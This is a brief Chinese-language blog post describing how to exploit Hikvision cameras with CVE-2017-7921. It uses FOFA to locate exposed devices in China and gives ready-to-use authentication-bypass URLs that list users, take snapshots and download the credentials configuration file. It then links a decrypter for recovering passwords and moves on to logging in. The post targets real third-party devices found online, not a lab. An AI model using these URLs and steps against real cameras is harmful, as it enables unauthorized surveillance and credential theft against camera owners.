海康威视CVE-2017-7921漏洞查找与利用

之前查看摄像头时发现了海康威视的存在CVE-2017-7921漏洞，因此找个试下。

1、fofa搜索

直接查找海康威视和中国地区的，很遗憾大部分都不能利用

点进去就能看到登录的后台地址

可以进行弱口令尝试，此处有点困难。

2、直接查看是否存在CVE-2017-7921漏洞

CVE-2017-7921存在3个漏洞

1、检索所有用户及其角色的列表

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2、在没有身份验证的情况下获取摄像头快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、下载摄像头配置账号密码文件

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

在fofa中找到的ip大部分漏洞已被修复，如果想要尝试这个漏洞，可能得找一会

3、还原配置文件账号密码

exe地址

https://github.com/Bin4xin/bigger-than-bigger/blob/master/CoVV/Hikvision%20Unauth/hikvision-decrypter.exe

使用方式简介，打开下载的配置文件-->加密 --> 解密 --> 输出 --> 二进制文件读取

当然导入时需要选择加密

打开文件后，从之前的users中得到登录账号名为admin，可以直接搜索，找到对应的密码。

4、登录尝试

可以关注公众号：码字的秃猴，一起玩耍哦